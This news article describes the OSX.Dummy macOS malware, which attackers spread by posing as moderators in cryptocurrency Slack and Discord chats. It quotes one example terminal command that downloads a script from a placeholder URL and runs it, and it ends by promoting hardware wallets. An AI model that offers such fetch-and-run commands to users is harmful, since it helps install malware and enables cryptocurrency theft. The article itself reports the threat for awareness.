Last week, Dutch computer security researcher Remco Verhoef discovered a new malware targeted at a fairly specific group: Mac OSX users who frequent cryptocurrency-focused Slack and Discord channels. Outlined in a post on BleepingComputer, the exploit — nicknamed OSX.Dummy, after a folder it creates in the infected machine’s hard drive — is unusual in that it requires a bit of social engineering on the attacker’s part to work. This allows the attacker to circumvent many existing OSX protections by tricking the user into installing malware on their own machine.
The OSX.Dummy attack works like this: The hacker quietly joins a Discord or Slack chat posing as a mod or admin, and offers seemingly helpful advice to users facing technical issues. The scammer then urges their victim to run a command within the Mac terminal, which they claim will solve the problem. Once entered, the command downloads a 34 MB binary file to the computer’s /tmp folder, then runs the file with root privileges.
Here’s an example of the code, with malicious download link removed:
cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script
Once OSX.Dummy has been downloaded and launched, the program uses its root-level access launch any time the OS reboots, then automatically connects with a server under the hacker’s control. This allows the attacker to gain full access to the infected computer. In addition to providing the hacker with root access, OSX.Dummy also saves the root password in a plaintext file in the system’s /tmp folders. If the infection isn’t fully removed, it’s possible that a later malware infection could simply look for this /tmp/dumpdummy folder and easily regain root access.
The full capabilities of OSX.Dummy aren’t known, but given that the scam was first discovered in cryptocurrency-focused Slack and Discord channels, the basic intent seems clear. As Malwarebytes’ Mac security expert Thomas Reed told BleepingComputer, “It’s a fair bet that they were interested in theft of cryptocurrency.”
Malware-downloading scams like OSX.Dummy are becoming more common and sophisticated every day. If your cryptocurrency is stored on your PC using a desktop wallet application, every malware infection represents a serious threat to your tokens. The best security solution is to remove your computer from the equation, and instead store your BTC, ETH, and other cryptocurrencies on a tethered, air-gapped hardware wallet.